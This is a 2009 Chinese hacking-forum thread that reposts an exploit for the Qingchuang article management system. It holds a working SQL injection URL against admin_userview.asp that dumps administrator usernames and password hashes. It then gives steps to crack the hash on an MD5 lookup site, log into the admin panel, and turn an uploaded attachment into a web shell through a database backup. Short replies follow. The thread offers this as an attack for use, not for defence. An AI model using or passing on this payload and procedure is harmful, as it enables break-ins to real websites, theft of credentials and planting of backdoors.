标题:
【转载】(注射)青创文章管理系统(漏洞)
[打印本页]
作者:
不属于
时间:
2009-11-3 15:25
标题:
【转载】(注射)青创文章管理系统(漏洞)
admin_userview.asp?unid=1%20and%201=2%20union%20select%201,2,3,username,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20article_admin
黑客
这个漏洞已经不算什么秘密了 网上也有很多教程
利用方法呢是 [url=http://]url:http://文章系统的网址.com/admin_userview.asp?unid=1%20and%201=2%20union%20select%201,2,3,username,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20from%20article_admin
看出来了个资料表 吧E-Mail:地址框里面的内容记下来 那个是管理员ID 下边的7a57a5a743894a0e乱码就是密码 我们打开
http://www.cmd5.com里面转换成密码文件就可以了 [url=http://www.3ast.com.cn]
网络安全
然后在打开后台[url=http://]url:http://文章系统的网址.com/admin_index.asp
输入管理员ID密码就可以了
然后是添加文章 当然是添加附件了呵呵 然后备份数据库 记录数据库地址 就是我们的SHELL了呵呵
作者:
凌波微步
时间:
2009-11-3 15:25
牛。。。
要是做个教程就好了!
顶。。。
作者:
家穷人丑口口
时间:
2009-11-3 15:25
我去找一下相关方面的说明。谢谢了
作者:
yoii0
时间:
2009-11-3 15:25
没看懂。。。
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2